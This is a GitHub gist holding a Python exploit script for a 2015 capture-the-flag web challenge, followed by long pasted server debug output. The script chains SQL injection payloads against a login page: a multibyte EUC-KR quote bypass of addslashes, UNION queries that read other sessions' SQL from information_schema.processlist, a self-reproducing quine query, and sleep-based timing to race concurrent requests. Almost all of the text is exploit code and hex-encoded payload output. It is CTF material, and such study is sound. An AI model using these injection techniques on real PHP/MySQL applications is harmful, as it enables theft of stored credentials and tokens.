Skip to content

Instantly share code, notes, and snippets.

@stypr

stypr/pwn.py

Last active August 17, 2019 19:33
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save stypr/b521911335980236c28c to your computer and use it in GitHub Desktop.
Save stypr/b521911335980236c28c to your computer and use it in GitHub Desktop.
Download ZIP
jff3 2015: web_mbm2 exploit
Raw
pwn.py
#!/usr/bin/python
'''
how to use
1) python pwn.py 1
2) python pwn.py 5
3) look at the "pwn.py 1" instance
'''
import urllib2
import urllib
import sys
import random
import time
# exploit
# r_3id => id,pw
a= ("' union select (select substr(info,36,length(info)-36) from information_schema.processlist where db=database() and id=connection_id() limit 1), (select concat(substr(info,72,length(info)-75),0x312923) from information_schema.processlist where info like 0x2569642c70772c746f6b656e25 and time_ms>3000 limit 1)#").encode("hex")
# r2_token => id,token
b= ("' union select 0x" + a + ", REPLACE(REPLACE(REPLACE('\\\' union select 0x" + a + ", REPLACE(REPLACE(REPLACE(\"$\",CHAR(34),CHAR(39)),CHAR(36),\"$\"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#',CHAR(34),CHAR(39)),CHAR(36),'\\\' union select 0x" + a + ", REPLACE(REPLACE(REPLACE(\"$\",CHAR(34),CHAR(39)),CHAR(36),\"$\"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#'),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#").encode("hex")
#r1_id => id,pw,token
c= ("+union+select+0x61646d696e,substr(info,72,length(info)-72),0x" + b + "+from+information_schema.processlist+where+db=database()+and+id=connection_id()+limit+1+union+select+1,2,sleep(" + sys.argv[1] + ")%23")
payload = "uid=%BF%27%0A%23&upw=%0A" + c
temp = ""
while 1:
#request_packet = urllib2.Request("http://ctf.leaveret.kr/go/37a6f7a829e19a70e85c8eca53489439/?page=login_chk", payload)
request_packet = urllib2.Request("http://????????/?uid=%BF%27%0A%23&upw=%0A" + c)
request_packet.add_header('Cookie', 'PHPSESSID=boa65u1m96ton8ri9ros5qhjl2;')
request_data = urllib2.urlopen(request_packet)
request_data = request_data.read()
#print(request_data)
#sys.exit(0)
if(request_data == temp):
temp = request_data
elif not temp:
temp = request_data
else:
print(request_data)
sys.exit(0)
'''
 stypr  /  web  ctf  500  python race_condition_sleep_1.py 1
<pre>addslashes($_GET['uid']) = ?\'
#
addslashes($_GET['upw']) =
union select 0x61646d696e,substr(info,72,length(info)-72),0x2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c41434528275c2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c414345282224222c43484152283334292c4348415228333929292c43484152283336292c222422292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e6523272c43484152283334292c4348415228333929292c43484152283336292c275c2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c414345282224222c43484152283334292c4348415228333929292c43484152283336292c222422292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e652327292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e6523 from information_schema.processlist where db=database() and id=connection_id() limit 1 union select 1,2,sleep(1)#
$uid (mb_convert_encoding from utf-8 to euc-kr) = ?'
#
strlen($uid) = 4
---------
[!] ERROR CHK:
[*] QUERY RUN: select id,pw,token from member where id='?'
#' and 'chk'='chk' and pw='
union select 0x61646d696e,substr(info,72,length(info)-72),0x2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c41434528275c2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c414345282224222c43484152283334292c4348415228333929292c43484152283336292c222422292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e6523272c43484152283334292c4348415228333929292c43484152283336292c275c2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c414345282224222c43484152283334292c4348415228333929292c43484152283336292c222422292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e652327292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e6523 from information_schema.processlist where db=database() and id=connection_id() limit 1 union select 1,2,sleep(1)#'
$r = Array
(
[0] => admin
[id] => admin
[1] =>
union select 0x61646d696e,substr(info,72,length(info)-72),0x2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c41434528275c2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c414345282224222c43484152283334292c4348415228333929292c43484152283336292c222422292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e6523272c43484152283334292c4348415228333929292c43484152283336292c275c2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c414345282224222c43484152283334292c4348415228333929292c43484152283336292c222422292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e652327292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e6523 from information_schema.processlist where db=database() and id=connection_id() limit 1 union select 1,2,sleep(1)#
[pw] =>
union select 0x61646d696e,substr(info,72,length(info)-72),0x2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c41434528275c2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c414345282224222c43484152283334292c4348415228333929292c43484152283336292c222422292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e6523272c43484152283334292c4348415228333929292c43484152283336292c275c2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c414345282224222c43484152283334292c4348415228333929292c43484152283336292c222422292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e652327292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e6523 from information_schema.processlist where db=database() and id=connection_id() limit 1 union select 1,2,sleep(1)#
[2] => ' union select 0x2720756e696f6e2073656c656374202873656c6563742073756273747228696e666f2c33362c6c656e67746828696e666f292d3336292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c6973742077686572652064623d6461746162617365282920616e642069643d636f6e6e656374696f6e5f69642829206c696d69742031292c202873656c65637420636f6e6361742873756273747228696e666f2c37322c6c656e67746828696e666f292d3735292c3078333132393233292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c69737420776865726520696e666f206c696b65203078323536393634326337303737326337343666366236353665323520616e642074696d655f6d733e33206c696d697420312923, REPLACE(REPLACE(REPLACE('\' union select 0x2720756e696f6e2073656c656374202873656c6563742073756273747228696e666f2c33362c6c656e67746828696e666f292d3336292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c6973742077686572652064623d6461746162617365282920616e642069643d636f6e6e656374696f6e5f69642829206c696d69742031292c202873656c65637420636f6e6361742873756273747228696e666f2c37322c6c656e67746828696e666f292d3735292c3078333132393233292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c69737420776865726520696e666f206c696b65203078323536393634326337303737326337343666366236353665323520616e642074696d655f6d733e33206c696d697420312923, REPLACE(REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#',CHAR(34),CHAR(39)),CHAR(36),'\' union select 0x2720756e696f6e2073656c656374202873656c6563742073756273747228696e666f2c33362c6c656e67746828696e666f292d3336292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c6973742077686572652064623d6461746162617365282920616e642069643d636f6e6e656374696f6e5f69642829206c696d69742031292c202873656c65637420636f6e6361742873756273747228696e666f2c37322c6c656e67746828696e666f292d3735292c3078333132393233292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c69737420776865726520696e666f206c696b65203078323536393634326337303737326337343666366236353665323520616e642074696d655f6d733e33206c696d697420312923, REPLACE(REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#'),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#
[token] => ' union select 0x2720756e696f6e2073656c656374202873656c6563742073756273747228696e666f2c33362c6c656e67746828696e666f292d3336292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c6973742077686572652064623d6461746162617365282920616e642069643d636f6e6e656374696f6e5f69642829206c696d69742031292c202873656c65637420636f6e6361742873756273747228696e666f2c37322c6c656e67746828696e666f292d3735292c3078333132393233292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c69737420776865726520696e666f206c696b65203078323536393634326337303737326337343666366236353665323520616e642074696d655f6d733e33206c696d697420312923, REPLACE(REPLACE(REPLACE('\' union select 0x2720756e696f6e2073656c656374202873656c6563742073756273747228696e666f2c33362c6c656e67746828696e666f292d3336292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c6973742077686572652064623d6461746162617365282920616e642069643d636f6e6e656374696f6e5f69642829206c696d69742031292c202873656c65637420636f6e6361742873756273747228696e666f2c37322c6c656e67746828696e666f292d3735292c3078333132393233292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c69737420776865726520696e666f206c696b65203078323536393634326337303737326337343666366236353665323520616e642074696d655f6d733e33206c696d697420312923, REPLACE(REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#',CHAR(34),CHAR(39)),CHAR(36),'\' union select 0x2720756e696f6e2073656c656374202873656c6563742073756273747228696e666f2c33362c6c656e67746828696e666f292d3336292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c6973742077686572652064623d6461746162617365282920616e642069643d636f6e6e656374696f6e5f69642829206c696d69742031292c202873656c65637420636f6e6361742873756273747228696e666f2c37322c6c656e67746828696e666f292d3735292c3078333132393233292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c69737420776865726520696e666f206c696b65203078323536393634326337303737326337343666366236353665323520616e642074696d655f6d733e33206c696d697420312923, REPLACE(REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#'),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#
)
[!] ERROR CHK:
$r2 = Array
(
[0] => ' union select (select substr(info,36,length(info)-36) from information_schema.processlist where db=database() and id=connection_id() limit 1), (select concat(substr(info,72,length(info)-75),0x312923) from information_schema.processlist where info like 0x2569642c70772c746f6b656e25 and time_ms>3 limit 1)#
[id] => ' union select (select substr(info,36,length(info)-36) from information_schema.processlist where db=database() and id=connection_id() limit 1), (select concat(substr(info,72,length(info)-75),0x312923) from information_schema.processlist where info like 0x2569642c70772c746f6b656e25 and time_ms>3 limit 1)#
[1] => ' union select 0x2720756e696f6e2073656c656374202873656c6563742073756273747228696e666f2c33362c6c656e67746828696e666f292d3336292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c6973742077686572652064623d6461746162617365282920616e642069643d636f6e6e656374696f6e5f69642829206c696d69742031292c202873656c65637420636f6e6361742873756273747228696e666f2c37322c6c656e67746828696e666f292d3735292c3078333132393233292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c69737420776865726520696e666f206c696b65203078323536393634326337303737326337343666366236353665323520616e642074696d655f6d733e33206c696d697420312923, REPLACE(REPLACE(REPLACE('\' union select 0x2720756e696f6e2073656c656374202873656c6563742073756273747228696e666f2c33362c6c656e67746828696e666f292d3336292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c6973742077686572652064623d6461746162617365282920616e642069643d636f6e6e656374696f6e5f69642829206c696d69742031292c202873656c65637420636f6e6361742873756273747228696e666f2c37322c6c656e67746828696e666f292d3735292c3078333132393233292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c69737420776865726520696e666f206c696b65203078323536393634326337303737326337343666366236353665323520616e642074696d655f6d733e33206c696d697420312923, REPLACE(REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#',CHAR(34),CHAR(39)),CHAR(36),'\' union select 0x2720756e696f6e2073656c656374202873656c6563742073756273747228696e666f2c33362c6c656e67746828696e666f292d3336292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c6973742077686572652064623d6461746162617365282920616e642069643d636f6e6e656374696f6e5f69642829206c696d69742031292c202873656c65637420636f6e6361742873756273747228696e666f2c37322c6c656e67746828696e666f292d3735292c3078333132393233292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c69737420776865726520696e666f206c696b65203078323536393634326337303737326337343666366236353665323520616e642074696d655f6d733e33206c696d697420312923, REPLACE(REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#'),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#
[token] => ' union select 0x2720756e696f6e2073656c656374202873656c6563742073756273747228696e666f2c33362c6c656e67746828696e666f292d3336292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c6973742077686572652064623d6461746162617365282920616e642069643d636f6e6e656374696f6e5f69642829206c696d69742031292c202873656c65637420636f6e6361742873756273747228696e666f2c37322c6c656e67746828696e666f292d3735292c3078333132393233292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c69737420776865726520696e666f206c696b65203078323536393634326337303737326337343666366236353665323520616e642074696d655f6d733e33206c696d697420312923, REPLACE(REPLACE(REPLACE('\' union select 0x2720756e696f6e2073656c656374202873656c6563742073756273747228696e666f2c33362c6c656e67746828696e666f292d3336292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c6973742077686572652064623d6461746162617365282920616e642069643d636f6e6e656374696f6e5f69642829206c696d69742031292c202873656c65637420636f6e6361742873756273747228696e666f2c37322c6c656e67746828696e666f292d3735292c3078333132393233292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c69737420776865726520696e666f206c696b65203078323536393634326337303737326337343666366236353665323520616e642074696d655f6d733e33206c696d697420312923, REPLACE(REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#',CHAR(34),CHAR(39)),CHAR(36),'\' union select 0x2720756e696f6e2073656c656374202873656c6563742073756273747228696e666f2c33362c6c656e67746828696e666f292d3336292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c6973742077686572652064623d6461746162617365282920616e642069643d636f6e6e656374696f6e5f69642829206c696d69742031292c202873656c65637420636f6e6361742873756273747228696e666f2c37322c6c656e67746828696e666f292d3735292c3078333132393233292066726f6d20696e666f726d6174696f6e5f736368656d612e70726f636573736c69737420776865726520696e666f206c696b65203078323536393634326337303737326337343666366236353665323520616e642074696d655f6d733e33206c696d697420312923, REPLACE(REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#'),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#
)
[!] ERROR CHK:
$r3 = Array
(
[0] => ' union select (select substr(info,36,length(info)-36) from information_schema.processlist where db=database() and id=connection_id() limit 1), (select concat(substr(info,72,length(info)-75),0x312923) from information_schema.processlist where info like 0x2569642c70772c746f6b656e25 and time_ms>3 limit 1)#
[id] => ' union select (select substr(info,36,length(info)-36) from information_schema.processlist where db=database() and id=connection_id() limit 1), (select concat(substr(info,72,length(info)-75),0x312923) from information_schema.processlist where info like 0x2569642c70772c746f6b656e25 and time_ms>3 limit 1)#
[1] =>
union select 0x61646d696e,substr(info,72,length(info)-72),0x2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c41434528275c2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c414345282224222c43484152283334292c4348415228333929292c43484152283336292c222422292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e6523272c43484152283334292c4348415228333929292c43484152283336292c275c2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c414345282224222c43484152283334292c4348415228333929292c43484152283336292c222422292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e652327292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e6523 from information_schema.processlist where db=database() and id=connection_id() limit 1 union select 1,2,sleep(1)#
[pw] =>
